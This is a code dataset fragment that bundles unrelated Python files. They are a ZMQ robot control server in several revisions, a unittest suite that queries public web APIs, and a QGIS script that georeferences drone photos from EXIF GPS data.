methods\n return msgs.list_reply(callables)\n\n def call_method(self, name, method, params):\n \"\"\"Call a previously registered subsystem method by name. 
Only\n methods tagged with the @api_call decorator can be called.\n\n :param name: Assigned name of the registered subsystem.\n :type name: string\n :param method: Subsystem method to be called.\n :type method: string\n :param params: Additional parameters for the called method.\n :type params: dict\n :returns: call_reply or error message dict to be sent to caller.\n\n \"\"\"\n self.logger.debug('API call: {}.{}({})'.format(name, method, params))\n if name in self.systems:\n obj = self.systems[name]\n if is_api_method(obj, method):\n try:\n call_return = getattr(obj, method)(**params)\n msg = 'Called {}.{}'.format(name, method)\n self.logger.debug(msg + ',returned:{}'.format(call_return))\n return msgs.call_reply(msg, call_return)\n except TypeError:\n err_msg = 'Invalid params for {}.{}'.format(name, method)\n self.logger.warning(err_msg)\n return msgs.error(err_msg)\n except Exception as e:\n err_msg = \"Exception: '{}'\".format(str(e))\n self.logger.warning(err_msg)\n return msgs.error(err_msg)\n else:\n err_msg = \"Invalid method: '{}.{}'\".format(name, method)\n self.logger.warning(err_msg)\n return msgs.error(err_msg)\n else:\n err_msg = \"Invalid object: '{}'\".format(name)\n self.logger.warning(err_msg)\n return msgs.error(err_msg)\n\n @lib.api_call\n def echo(self, msg=None):\n \"\"\"Echo a message back to the caller.\n\n :param msg: Message to be echoed back to caller, default is None.\n :returns: Message given by param, defaults to None.\n\n \"\"\"\n return msg\n\n @lib.api_call\n def exception(self):\n \"\"\"Raise a test exception which will be returned to the caller.\"\"\"\n raise Exception('Exception test')\n\n @lib.api_call\n def spawn_pub_server(self):\n \"\"\"Spawn publisher thread.\"\"\"\n if self.pub_server is None:\n self.pub_server = pub_server_mod.PubServer(self.systems)\n self.pub_server.setDaemon(True)\n self.pub_server.start()\n msg = 'Spawned pub server'\n self.logger.info(msg)\n return msg\n else:\n err_msg = 'PubServer is already running'\n self.logger.warning(err_msg)\n return err_msg\n\n @lib.api_call\n def stop_full(self):\n \"\"\"Stop all drive and gun motors, set turret to safe state.\"\"\"\n self.systems['driver'].move(0, 0)\n\n def clean_up(self):\n \"\"\"Tear down ZMQ socket.\"\"\"\n self.stop_full()\n self.ctrl_sock.close()\n self.context.term()\n\n\nif __name__ == '__main__':\n if len(sys.argv) == 2:\n server = CtrlServer(sys.argv[1])\n else:\n server = CtrlServer()\n server.listen()\n", "step-4": "<mask token>\nimport sys\nimport os\nfrom inspect import getmembers, ismethod\nfrom simplejson.decoder import JSONDecodeError\nimport zmq\nimport signal\nsys.path = [os.getcwd()] + sys.path\nimport bot.lib.lib as lib\nimport pub_server as pub_server_mod\nimport bot.lib.messages as msgs\nfrom bot.driver.mec_driver import MecDriver\n\n\ndef is_api_method(obj, name):\n \"\"\"Tests whether named method exists in obj and is flagged for API export.\n\n :param obj: API-exported object to search for the given method on.\n :type ojb: string\n :param name: Name of method to check for.\n :type name: string\n :returns: True if given method is on given obj and is exported, else False.\n\n \"\"\"\n try:\n method = getattr(obj, name)\n except AttributeError:\n return False\n return ismethod(method) and hasattr(method, '__api_call')\n\n\nclass CtrlServer(object):\n \"\"\"Exports bot control via ZMQ.\n\n Most functionally exported by CtrlServer is in the form of methods\n exposed by the API. @lib.api_call decorators can be added to bot\n systems, which tags them for export. 
They can then be called\n remotely via CtrlClient, which is typically owned by an interface\n like the CLI, which typically accepts commands from an agent like\n a human.\n\n Some control is exported directly by CtrlServer, not through the\n API. For example, CtrlServer responds directly to ping messages,\n list messages (which give the objects/methods exposed by the API),\n and exit messages.\n\n CtrlServer is the primary owner of bot resources, which we call\n systems. For example, it's CtrlServer that instantiates gunner\n and follower. Through those two, CtrlServer owns the gun, the\n IR hub, the turret and basically every other bot system.\n\n The messages that CtrlServer accepts and responds with are fully\n specified in lib.messages. Make any changes to messages there.\n\n CtrlServer can be instructed (via the API) to spawn a new thread\n for a PubServer. When that happens, CtrlServer passes its systems\n to PubServer, which can read their state and publish it over a\n ZMQ PUB socket.\n\n \"\"\"\n\n def __init__(self, testing=None, config_file='bot/config.yaml'):\n \"\"\"Build ZMQ REP socket and instantiate bot systems.\n\n :param testing: True if running on simulated HW, False if on bot.\n :type testing: boolean\n :param config_file: Name of file to read configuration from.\n :type config_file: string\n\n \"\"\"\n signal.signal(signal.SIGINT, self.signal_handler)\n self.config = lib.get_config(config_file)\n self.logger = lib.get_logger()\n if testing is True or testing == 'True':\n self.logger.info('CtrlServer running in test mode')\n lib.set_testing(True)\n elif testing is None:\n self.logger.info('Defaulting to config testing flag: {}'.format\n (self.config['testing']))\n lib.set_testing(self.config['testing'])\n else:\n self.logger.info('CtrlServer running in non-test mode')\n lib.set_testing(False)\n self.context = zmq.Context()\n self.ctrl_sock = self.context.socket(zmq.REP)\n self.server_bind_addr = '{protocol}://{host}:{port}'.format(protocol\n =self.config['server_protocol'], host=self.config[\n 'server_bind_host'], port=self.config['ctrl_server_port'])\n try:\n self.ctrl_sock.bind(self.server_bind_addr)\n except zmq.ZMQError:\n self.logger.error('ZMQ error. Is a server already running?')\n self.logger.warning('May be connected to an old server instance.')\n sys.exit(1)\n self.systems = self.assign_subsystems()\n self.logger.info('Control server initialized')\n self.pub_server = None\n\n def signal_handler(self, signal, frame):\n self.logger.info('Caught SIGINT (Ctrl+C), closing cleanly')\n self.clean_up()\n self.logger.info('Cleaned up bot, exiting...')\n sys.exit(0)\n\n def assign_subsystems(self):\n \"\"\"Instantiates and stores references to bot subsystems.\n\n :returns: Dict of subsystems, maps system name to instantiated object.\n\n \"\"\"\n self.driver = MecDriver()\n systems = {}\n systems['ctrl'] = self\n systems['driver'] = self.driver\n self.logger.debug('Systems: {}'.format(systems))\n return systems\n\n def listen(self):\n \"\"\"Perpetually listen for messages, pass them to generic handler.\"\"\"\n self.logger.info('Control server: {}'.format(self.server_bind_addr))\n while True:\n try:\n msg = self.ctrl_sock.recv_json()\n reply = self.handle_msg(msg)\n self.logger.debug('Sending: {}'.format(reply))\n self.ctrl_sock.send_json(reply)\n except JSONDecodeError:\n err_msg = 'Not a JSON message!'\n self.logger.warning(err_msg)\n self.ctrl_sock.send_json(msgs.error(err_msg))\n except KeyboardInterrupt:\n self.logger.info('Exiting control server. 
Bye!')\n self.clean_up()\n sys.exit(0)\n\n def handle_msg(self, msg):\n \"\"\"Generic message handler. Hands-off based on type of message.\n\n :param msg: Message, received via ZMQ from client, to handle.\n :type msg: dict\n :returns: An appropriate message reply dict, from lib.messages.\n\n \"\"\"\n self.logger.debug('Received: {}'.format(msg))\n try:\n msg_type = msg['type']\n except KeyError as e:\n return msgs.error(e)\n if msg_type == 'ping_req':\n reply = msgs.ping_reply()\n elif msg_type == 'list_req':\n reply = self.list_callables()\n elif msg_type == 'call_req':\n try:\n obj_name = msg['obj_name']\n method = msg['method']\n params = msg['params']\n reply = self.call_method(obj_name, method, params)\n except KeyError as e:\n return msgs.error(e)\n elif msg_type == 'exit_req':\n self.logger.info('Received message to die. Bye!')\n reply = msgs.exit_reply()\n self.logger.debug('Sending: {}'.format(reply))\n self.ctrl_sock.send_json(reply)\n self.clean_up()\n sys.exit(0)\n else:\n err_msg = 'Unrecognized message: {}'.format(msg)\n self.logger.warning(err_msg)\n reply = msgs.error(err_msg)\n return reply\n\n def list_callables(self):\n \"\"\"Build list of callable methods on each exported subsystem object.\n\n Uses introspection to create a list of callable methods for each\n registered subsystem object. Only methods which are flagged using the\n @lib.api_call decorator will be included.\n\n :returns: list_reply message with callable objects and their methods.\n\n \"\"\"\n self.logger.debug('List of callable API objects requested')\n callables = {}\n for name, obj in self.systems.items():\n methods = []\n for member in getmembers(obj):\n if is_api_method(obj, member[0]):\n methods.append(member[0])\n callables[name] = methods\n return msgs.list_reply(callables)\n\n def call_method(self, name, method, params):\n \"\"\"Call a previously registered subsystem method by name. 
Only\n methods tagged with the @api_call decorator can be called.\n\n :param name: Assigned name of the registered subsystem.\n :type name: string\n :param method: Subsystem method to be called.\n :type method: string\n :param params: Additional parameters for the called method.\n :type params: dict\n :returns: call_reply or error message dict to be sent to caller.\n\n \"\"\"\n self.logger.debug('API call: {}.{}({})'.format(name, method, params))\n if name in self.systems:\n obj = self.systems[name]\n if is_api_method(obj, method):\n try:\n call_return = getattr(obj, method)(**params)\n msg = 'Called {}.{}'.format(name, method)\n self.logger.debug(msg + ',returned:{}'.format(call_return))\n return msgs.call_reply(msg, call_return)\n except TypeError:\n err_msg = 'Invalid params for {}.{}'.format(name, method)\n self.logger.warning(err_msg)\n return msgs.error(err_msg)\n except Exception as e:\n err_msg = \"Exception: '{}'\".format(str(e))\n self.logger.warning(err_msg)\n return msgs.error(err_msg)\n else:\n err_msg = \"Invalid method: '{}.{}'\".format(name, method)\n self.logger.warning(err_msg)\n return msgs.error(err_msg)\n else:\n err_msg = \"Invalid object: '{}'\".format(name)\n self.logger.warning(err_msg)\n return msgs.error(err_msg)\n\n @lib.api_call\n def echo(self, msg=None):\n \"\"\"Echo a message back to the caller.\n\n :param msg: Message to be echoed back to caller, default is None.\n :returns: Message given by param, defaults to None.\n\n \"\"\"\n return msg\n\n @lib.api_call\n def exception(self):\n \"\"\"Raise a test exception which will be returned to the caller.\"\"\"\n raise Exception('Exception test')\n\n @lib.api_call\n def spawn_pub_server(self):\n \"\"\"Spawn publisher thread.\"\"\"\n if self.pub_server is None:\n self.pub_server = pub_server_mod.PubServer(self.systems)\n self.pub_server.setDaemon(True)\n self.pub_server.start()\n msg = 'Spawned pub server'\n self.logger.info(msg)\n return msg\n else:\n err_msg = 'PubServer is already running'\n self.logger.warning(err_msg)\n return err_msg\n\n @lib.api_call\n def stop_full(self):\n \"\"\"Stop all drive and gun motors, set turret to safe state.\"\"\"\n self.systems['driver'].move(0, 0)\n\n def clean_up(self):\n \"\"\"Tear down ZMQ socket.\"\"\"\n self.stop_full()\n self.ctrl_sock.close()\n self.context.term()\n\n\nif __name__ == '__main__':\n if len(sys.argv) == 2:\n server = CtrlServer(sys.argv[1])\n else:\n server = CtrlServer()\n server.listen()\n", "step-5": "#!/usr/bin/env python\n\"\"\"Server that accepts and executes control-type commands on the bot.\"\"\"\n\nimport sys\nimport os\nfrom inspect import getmembers, ismethod\nfrom simplejson.decoder import JSONDecodeError\nimport zmq\nimport signal\n\n# This is required to make imports work\nsys.path = [os.getcwd()] + sys.path\n\nimport bot.lib.lib as lib\nimport pub_server as pub_server_mod\nimport bot.lib.messages as msgs\n\nfrom bot.driver.mec_driver import MecDriver\n\n\ndef is_api_method(obj, name):\n \"\"\"Tests whether named method exists in obj and is flagged for API export.\n\n :param obj: API-exported object to search for the given method on.\n :type ojb: string\n :param name: Name of method to check for.\n :type name: string\n :returns: True if given method is on given obj and is exported, else False.\n\n \"\"\"\n try:\n method = getattr(obj, name)\n except AttributeError:\n return False\n return (ismethod(method) and hasattr(method, \"__api_call\"))\n\n\nclass CtrlServer(object):\n\n \"\"\"Exports bot control via ZMQ.\n\n Most functionally exported by 
CtrlServer is in the form of methods\n exposed by the API. @lib.api_call decorators can be added to bot\n systems, which tags them for export. They can then be called\n remotely via CtrlClient, which is typically owned by an interface\n like the CLI, which typically accepts commands from an agent like\n a human.\n\n Some control is exported directly by CtrlServer, not through the\n API. For example, CtrlServer responds directly to ping messages,\n list messages (which give the objects/methods exposed by the API),\n and exit messages.\n\n CtrlServer is the primary owner of bot resources, which we call\n systems. For example, it's CtrlServer that instantiates gunner\n and follower. Through those two, CtrlServer owns the gun, the\n IR hub, the turret and basically every other bot system.\n\n The messages that CtrlServer accepts and responds with are fully\n specified in lib.messages. Make any changes to messages there.\n\n CtrlServer can be instructed (via the API) to spawn a new thread\n for a PubServer. When that happens, CtrlServer passes its systems\n to PubServer, which can read their state and publish it over a\n ZMQ PUB socket.\n\n \"\"\"\n\n def __init__(self, testing=None, config_file=\"bot/config.yaml\"):\n \"\"\"Build ZMQ REP socket and instantiate bot systems.\n\n :param testing: True if running on simulated HW, False if on bot.\n :type testing: boolean\n :param config_file: Name of file to read configuration from.\n :type config_file: string\n\n \"\"\"\n # Register signal handler, shut down cleanly (think motors)\n signal.signal(signal.SIGINT, self.signal_handler)\n\n # Load configuration and logger\n self.config = lib.get_config(config_file)\n self.logger = lib.get_logger()\n\n # Testing flag will cause objects to run on simulated hardware\n if testing is True or testing == \"True\":\n self.logger.info(\"CtrlServer running in test mode\")\n lib.set_testing(True)\n elif testing is None:\n self.logger.info(\n \"Defaulting to config testing flag: {}\".format(\n self.config[\"testing\"]))\n lib.set_testing(self.config[\"testing\"])\n else:\n self.logger.info(\"CtrlServer running in non-test mode\")\n lib.set_testing(False)\n\n # Build socket to listen for requests\n self.context = zmq.Context()\n self.ctrl_sock = self.context.socket(zmq.REP)\n self.server_bind_addr = \"{protocol}://{host}:{port}\".format(\n protocol=self.config[\"server_protocol\"],\n host=self.config[\"server_bind_host\"],\n port=self.config[\"ctrl_server_port\"])\n try:\n self.ctrl_sock.bind(self.server_bind_addr)\n except zmq.ZMQError:\n self.logger.error(\"ZMQ error. 
Is a server already running?\")\n self.logger.warning(\"May be connected to an old server instance.\")\n sys.exit(1)\n\n self.systems = self.assign_subsystems()\n self.logger.info(\"Control server initialized\")\n\n # Don't spawn pub_server until told to\n self.pub_server = None\n\n def signal_handler(self, signal, frame):\n self.logger.info(\"Caught SIGINT (Ctrl+C), closing cleanly\")\n self.clean_up()\n self.logger.info(\"Cleaned up bot, exiting...\")\n sys.exit(0)\n\n def assign_subsystems(self):\n \"\"\"Instantiates and stores references to bot subsystems.\n\n :returns: Dict of subsystems, maps system name to instantiated object.\n\n \"\"\"\n\n self.driver = MecDriver()\n\n systems = {}\n systems[\"ctrl\"] = self\n systems[\"driver\"] = self.driver\n\n self.logger.debug(\"Systems: {}\".format(systems))\n return systems\n\n def listen(self):\n \"\"\"Perpetually listen for messages, pass them to generic handler.\"\"\"\n self.logger.info(\"Control server: {}\".format(self.server_bind_addr))\n while True:\n try:\n msg = self.ctrl_sock.recv_json()\n reply = self.handle_msg(msg)\n self.logger.debug(\"Sending: {}\".format(reply))\n self.ctrl_sock.send_json(reply)\n except JSONDecodeError:\n err_msg = \"Not a JSON message!\"\n self.logger.warning(err_msg)\n self.ctrl_sock.send_json(msgs.error(err_msg))\n except KeyboardInterrupt:\n self.logger.info(\"Exiting control server. Bye!\")\n self.clean_up()\n sys.exit(0)\n\n def handle_msg(self, msg):\n \"\"\"Generic message handler. Hands-off based on type of message.\n\n :param msg: Message, received via ZMQ from client, to handle.\n :type msg: dict\n :returns: An appropriate message reply dict, from lib.messages.\n\n \"\"\"\n self.logger.debug(\"Received: {}\".format(msg))\n\n try:\n msg_type = msg[\"type\"]\n except KeyError as e:\n return msgs.error(e)\n\n if msg_type == \"ping_req\":\n reply = msgs.ping_reply()\n elif msg_type == \"list_req\":\n reply = self.list_callables()\n elif msg_type == \"call_req\":\n try:\n obj_name = msg[\"obj_name\"]\n method = msg[\"method\"]\n params = msg[\"params\"]\n reply = self.call_method(obj_name, method, params)\n except KeyError as e:\n return msgs.error(e)\n elif msg_type == \"exit_req\":\n self.logger.info(\"Received message to die. Bye!\")\n reply = msgs.exit_reply()\n # Need to actually send reply here as we're about to exit\n self.logger.debug(\"Sending: {}\".format(reply))\n self.ctrl_sock.send_json(reply)\n self.clean_up()\n sys.exit(0)\n else:\n err_msg = \"Unrecognized message: {}\".format(msg)\n self.logger.warning(err_msg)\n reply = msgs.error(err_msg)\n return reply\n\n def list_callables(self):\n \"\"\"Build list of callable methods on each exported subsystem object.\n\n Uses introspection to create a list of callable methods for each\n registered subsystem object. Only methods which are flagged using the\n @lib.api_call decorator will be included.\n\n :returns: list_reply message with callable objects and their methods.\n\n \"\"\"\n self.logger.debug(\"List of callable API objects requested\")\n # Dict of subsystem object names to their callable methods.\n callables = {}\n for name, obj in self.systems.items():\n methods = []\n # Filter out methods which are not explicitly flagged for export\n for member in getmembers(obj):\n if is_api_method(obj, member[0]):\n methods.append(member[0])\n callables[name] = methods\n return msgs.list_reply(callables)\n\n def call_method(self, name, method, params):\n \"\"\"Call a previously registered subsystem method by name. 
Only\n methods tagged with the @api_call decorator can be called.\n\n :param name: Assigned name of the registered subsystem.\n :type name: string\n :param method: Subsystem method to be called.\n :type method: string\n :param params: Additional parameters for the called method.\n :type params: dict\n :returns: call_reply or error message dict to be sent to caller.\n\n \"\"\"\n self.logger.debug(\"API call: {}.{}({})\".format(name, method, params))\n if name in self.systems:\n obj = self.systems[name]\n if is_api_method(obj, method):\n try:\n # Calls given obj.method, unpacking and passing params dict\n call_return = getattr(obj, method)(**params)\n msg = \"Called {}.{}\".format(name, method)\n self.logger.debug(msg + \",returned:{}\".format(call_return))\n return msgs.call_reply(msg, call_return)\n except TypeError:\n # Raised when we have a mismatch of the method's kwargs\n # TODO: Return argspec here?\n err_msg = \"Invalid params for {}.{}\".format(name, method)\n self.logger.warning(err_msg)\n return msgs.error(err_msg)\n except Exception as e:\n # Catch exception raised by called method, notify client\n err_msg = \"Exception: '{}'\".format(str(e))\n self.logger.warning(err_msg)\n return msgs.error(err_msg)\n else:\n err_msg = \"Invalid method: '{}.{}'\".format(name, method)\n self.logger.warning(err_msg)\n return msgs.error(err_msg)\n else:\n err_msg = \"Invalid object: '{}'\".format(name)\n self.logger.warning(err_msg)\n return msgs.error(err_msg)\n\n @lib.api_call\n def echo(self, msg=None):\n \"\"\"Echo a message back to the caller.\n\n :param msg: Message to be echoed back to caller, default is None.\n :returns: Message given by param, defaults to None.\n\n \"\"\"\n return msg\n\n @lib.api_call\n def exception(self):\n \"\"\"Raise a test exception which will be returned to the caller.\"\"\"\n raise Exception(\"Exception test\")\n\n @lib.api_call\n def spawn_pub_server(self):\n \"\"\"Spawn publisher thread.\"\"\"\n if self.pub_server is None:\n self.pub_server = pub_server_mod.PubServer(self.systems)\n # Prevent pub_server thread from blocking the process from closing\n self.pub_server.setDaemon(True)\n self.pub_server.start()\n msg = \"Spawned pub server\"\n self.logger.info(msg)\n return msg\n else:\n err_msg = \"PubServer is already running\"\n self.logger.warning(err_msg)\n return err_msg\n\n @lib.api_call\n def stop_full(self):\n \"\"\"Stop all drive and gun motors, set turret to safe state.\"\"\"\n self.systems[\"driver\"].move(0, 0)\n\n def clean_up(self):\n \"\"\"Tear down ZMQ socket.\"\"\"\n self.stop_full()\n self.ctrl_sock.close()\n self.context.term()\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) == 2:\n server = CtrlServer(sys.argv[1])\n else:\n server = CtrlServer()\n server.listen()\n", "step-ids": [ 10, 13, 16, 18, 19 ] }
[ 10, 13, 16, 18, 19 ]
from funct import read_excel
import requests
import unittest
import HTMLTestReportCN


class v2exapi(unittest.TestCase):
    def test_node_api(self):
        """Query the v2ex node API for each node name read from Excel."""
        url = "https://www.v2ex.com/api/nodes/show.json"
        # Node names come from the first column of the first sheet
        node_names = read_excel("xx.xlsx", 0, 0)
        # for node_name in ['php', "python", "qna"]:  # hard-coded alternative
        for node_name in node_names:
            response = requests.request(
                "GET", url, params={"name": node_name}).json()
            self.assertEqual(response['name'], node_name)
            print(response)

    def test_novel_search_api(self):
        """Smoke-test the apiopen novel search endpoint."""
        url = "https://www.apiopen.top/novelSearchApi"
        # URL-encoded form of the novel title "盘龙"
        querystring = {"name": "%E7%9B%98%E9%BE%99"}
        headers = {
            'Cache-Control': "no-cache",
            'Postman-Token': "b249737d-aa24-4592-adf1-d19114f3f567"
        }
        response = requests.request(
            "GET", url, headers=headers, params=querystring)
        print(response.text)


if __name__ == '__main__':
    # unittest.main()
    suiteTest = unittest.TestSuite()
    suiteTest.addTest(unittest.makeSuite(v2exapi))
    filepath = 'report.html'
    # filepath = 'C:\\' + now + '.html'
    fp = open(filepath, 'wb')
    # Set the test report title and description
    runner = HTMLTestReportCN.HTMLTestRunner(
        stream=fp, title=u'Automated Test Report', description=u'Test Report')
    runner.run(suiteTest)
    fp.close()
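# --- Hedged sketch (not part of the dataset row above) ---
# The funct.read_excel helper imported above is not shown in this file. A
# plausible implementation matching the call read_excel("xx.xlsx", 0, 0),
# assuming the arguments are (path, sheet index, column index) and that the
# openpyxl package is available:
from openpyxl import load_workbook


def read_excel_sketch(path, sheet_index, col_index):
    """Return the non-empty values of one column of one worksheet."""
    wb = load_workbook(path, read_only=True)
    ws = wb.worksheets[sheet_index]
    values = []
    for row in ws.iter_rows(min_col=col_index + 1, max_col=col_index + 1,
                            values_only=True):
        if row[0] is not None:
            values.append(row[0])
    return values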
normal
{ "blob_id": "5cd573f2b7f91a8b20e96deb1004c0ef7fc62398", "index": 8072, "step-1": "<mask token>\n\n\nclass v2exapi(unittest.TestCase):\n\n def test_node_api(self):\n url = 'https://www.v2ex.com/api/nodes/show.json'\n a = read_excel('xx.xlsx', 0, 0)\n for node_name in a:\n response = requests.request('GET', url, params={'name': node_name}\n ).json()\n self.assertEqual(response['name'], node_name)\n print(response)\n <mask token>\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\nclass v2exapi(unittest.TestCase):\n\n def test_node_api(self):\n url = 'https://www.v2ex.com/api/nodes/show.json'\n a = read_excel('xx.xlsx', 0, 0)\n for node_name in a:\n response = requests.request('GET', url, params={'name': node_name}\n ).json()\n self.assertEqual(response['name'], node_name)\n print(response)\n\n def test_nade_type(self):\n url = 'https://www.apiopen.top/novelSearchApi'\n querystring = {'name': '%E7%9B%98%E9%BE%99'}\n headers = {'Cache-Control': 'no-cache', 'Postman-Token':\n 'b249737d-aa24-4592-adf1-d19114f3f567'}\n response = requests.request('GET', url, headers=headers, params=\n querystring)\n print(response.text)\n\n\n<mask token>\n", "step-3": "<mask token>\n\n\nclass v2exapi(unittest.TestCase):\n\n def test_node_api(self):\n url = 'https://www.v2ex.com/api/nodes/show.json'\n a = read_excel('xx.xlsx', 0, 0)\n for node_name in a:\n response = requests.request('GET', url, params={'name': node_name}\n ).json()\n self.assertEqual(response['name'], node_name)\n print(response)\n\n def test_nade_type(self):\n url = 'https://www.apiopen.top/novelSearchApi'\n querystring = {'name': '%E7%9B%98%E9%BE%99'}\n headers = {'Cache-Control': 'no-cache', 'Postman-Token':\n 'b249737d-aa24-4592-adf1-d19114f3f567'}\n response = requests.request('GET', url, headers=headers, params=\n querystring)\n print(response.text)\n\n\nif __name__ == '__main__':\n suiteTest = unittest.TestSuite()\n suiteTest.addTest(unittest.makeSuite(v2exapi))\n filepath = '' + 'report.html'\n fp = open(filepath, 'wb')\n runner = HTMLTestReportCN.HTMLTestRunner(stream=fp, title=u'自动化测试报告',\n description=u'测试报告')\n runner.run(suiteTest)\n fp.close()\n", "step-4": "from funct import read_excel\nimport requests\nimport unittest\nimport HTMLTestReportCN\n\n\nclass v2exapi(unittest.TestCase):\n\n def test_node_api(self):\n url = 'https://www.v2ex.com/api/nodes/show.json'\n a = read_excel('xx.xlsx', 0, 0)\n for node_name in a:\n response = requests.request('GET', url, params={'name': node_name}\n ).json()\n self.assertEqual(response['name'], node_name)\n print(response)\n\n def test_nade_type(self):\n url = 'https://www.apiopen.top/novelSearchApi'\n querystring = {'name': '%E7%9B%98%E9%BE%99'}\n headers = {'Cache-Control': 'no-cache', 'Postman-Token':\n 'b249737d-aa24-4592-adf1-d19114f3f567'}\n response = requests.request('GET', url, headers=headers, params=\n querystring)\n print(response.text)\n\n\nif __name__ == '__main__':\n suiteTest = unittest.TestSuite()\n suiteTest.addTest(unittest.makeSuite(v2exapi))\n filepath = '' + 'report.html'\n fp = open(filepath, 'wb')\n runner = HTMLTestReportCN.HTMLTestRunner(stream=fp, title=u'自动化测试报告',\n description=u'测试报告')\n runner.run(suiteTest)\n fp.close()\n", "step-5": "from funct import read_excel\nimport requests\nimport unittest\nimport HTMLTestReportCN\nclass v2exapi(unittest.TestCase):\n def test_node_api(self):\n url = \"https://www.v2ex.com/api/nodes/show.json\"\n\n #querystring = {\"name\":\"php\"}\n a=read_excel(\"xx.xlsx\",0,0)\n for node_name in a:\n #for node_name in 
['php',\"python\",\"qna\"]:\n\n\n response = requests.request(\"GET\", url, params={\"name\":node_name}).json()\n self.assertEqual(response['name'],node_name)\n print(response)\n def test_nade_type(self):\n\n\n url = \"https://www.apiopen.top/novelSearchApi\"\n\n querystring = {\"name\": \"%E7%9B%98%E9%BE%99\"}\n\n headers = {\n 'Cache-Control': \"no-cache\",\n 'Postman-Token': \"b249737d-aa24-4592-adf1-d19114f3f567\"\n }\n\n response = requests.request(\"GET\", url, headers=headers, params=querystring)\n\n print(response.text)\n\n\nif __name__ == '__main__':\n #unittest.main()\n suiteTest = unittest.TestSuite()\n suiteTest.addTest(unittest.makeSuite(v2exapi))\n filepath = '' + 'report.html'\n\n # filepath='C:\\\\'+now+'.html'\n\n fp = open(filepath, 'wb')\n # 定义测试报告的标题与描述\n runner = HTMLTestReportCN.HTMLTestRunner(stream=fp, title=u'自动化测试报告', description=u'测试报告')\n runner.run(suiteTest)\n fp.close()\n\n\n\n\n#print(type(list1))", "step-ids": [ 2, 3, 4, 5, 6 ] }
[ 2, 3, 4, 5, 6 ]
import glob
from PIL import Image
from PIL.ExifTags import TAGS, GPSTAGS
from pyproj import Proj
from osgeo import gdal, osr
from PyQt4.QtCore import QFile, QFileInfo
import os
#slika="c:\slike\Zito\DJI_0060.jpg"
#georef_slika="c:\Slike\Zito\Georeferencirana.tif"
radni_dir = 'c:/slike/Zito/testiranje/'

#----------------- Extract LAT/LONG from EXIF ------------------------------------------------------------------
def exif(img):
    """Return the decoded EXIF tags of an image as a dict."""
    exif_data = {}
    try:
        i = Image.open(img)
        tags = i._getexif()
        for tag, value in tags.items():
            decoded = TAGS.get(tag, tag)
            exif_data[decoded] = value
    except Exception:
        pass
    return exif_data

def dms2dd(d, m, s, i):
    """Convert degrees/minutes/seconds plus hemisphere letter to decimal degrees."""
    sec = float((m * 60) + s)
    dec = float(sec / 3600)
    deg = float(d + dec)
    if i.upper() == "W":
        deg = deg * -1
    elif i.upper() == "S":
        deg = deg * -1
    return float(deg)

def gps(exif):
    lat = None
    lon = None
    if exif["GPSInfo"]:
        coords = exif["GPSInfo"]
        # Lat -- the digit-concatenation below reads only the numerators of
        # the d/m/s rationals, a shortcut that assumes DJI-style EXIF values
        i = coords[1]
        d = coords[2][0][0]
        m = coords[2][1][0]
        s = coords[2][2][0]
        lat = float(str(d) + str(m) + str(s)) / 100000000
        # Lon
        i = coords[3]
        d = coords[4][0][0]
        m = coords[4][1][0]
        s = coords[4][2][0]
        lon = float(str(d) + str(m) + str(s)) / 100000000
    return lat, lon

#------------------ Convert LAT/LONG to UTM ---------------------------------------------------------------------
def pretvarac(fotka):
    global UTMx
    global UTMy
    Lat = gps(exif(fotka))[0]
    Lon = gps(exif(fotka))[1]
    print "Lon/Lat coordinates of the image: ", Lon, " ", Lat
    # Entered manually; could be computed in advance from the longitude.
    # Only the numeric zone goes into the proj string (no latitude band letter).
    ZoneNo = "34"
    myProj = Proj("+proj=utm +zone=" + ZoneNo + " +north +ellps=WGS84 +datum=WGS84 +units=m +no_defs")  # +north for the northern hemisphere
    UTMx, UTMy = myProj(Lon, Lat)
    UTMx = round(UTMx, 2)
    UTMy = round(UTMy, 2)
    print "UTM coordinates of the image: ", UTMx, " ", UTMy
    return UTMx, UTMy

#-------------------- Georeferencing ----------------------------------------------------------------------------
def georeferenciranje(src_filename, dst_filename):
    src_ds = gdal.Open(src_filename)
    format = "GTiff"
    driver = gdal.GetDriverByName(format)
    dst_ds = driver.CreateCopy(dst_filename, src_ds, 0)

    # Specify raster location through geotransform array
    # (upper_left_x, scale_x, skew_x, upper_left_y, skew_y, scale_y)
    # Scale = size of one pixel in units of raster projection
    # this example below assumes 100x100
    gt = [UTMx, 100, 0, UTMy, 0, -100]

    dst_ds.SetGeoTransform(gt)
    # WGS 84 / UTM zone 34N, matching the zone used in pretvarac() above
    epsg = 32634
    srs = osr.SpatialReference()
    srs.ImportFromEPSG(epsg)
    dest_wkt = srs.ExportToWkt()
    dst_ds.SetProjection(dest_wkt)
    dst_ds = None
    src_ds = None

#----------------- Load into QGIS --------------------------------------------------------------------------------
def ubacivanje(fileName):
    # QgsRasterLayer and iface are provided by the QGIS Python console
    print "loading raster"
    fileInfo = QFileInfo(fileName)
    baseName = fileInfo.baseName()
    rlayer = QgsRasterLayer(fileName, baseName)
    iface.addRasterLayer(fileName, "Raster Layer Zito")
    print "raster loaded"

#---------------- Folder loop -------------------------------------------------------------------------------------
li = []
l = 0
os.chdir(radni_dir)
# Build the list of image names (li) and georeference each photo
for file in glob.glob("*.jpg"):
    li.append(os.path.splitext(file)[0])
    l += 1
    pretvarac(file)
    gr = os.path.dirname(file) + str(l) + '_georeferencirana' + '.tif'
    georeferenciranje(file, gr)
    ubacivanje(gr)

#pretvarac(slika)
#georeferenciranje(slika, georef_slika)
#ubacivanje(georef_slika)
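# --- Hedged sketch (not part of the dataset row above) ---
# pretvarac() hard-codes UTM zone 34 and notes the zone could be computed
# from the longitude; the standard UTM zoning formula does exactly that, so
# the zone could be derived per photo:
def utm_zone(lon):
    """Return the UTM zone number (1-60) for a longitude in degrees."""
    return int((lon + 180) / 6) % 60 + 1

# e.g. utm_zone(21.0) -> 34, matching the hard-coded zone above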
normal
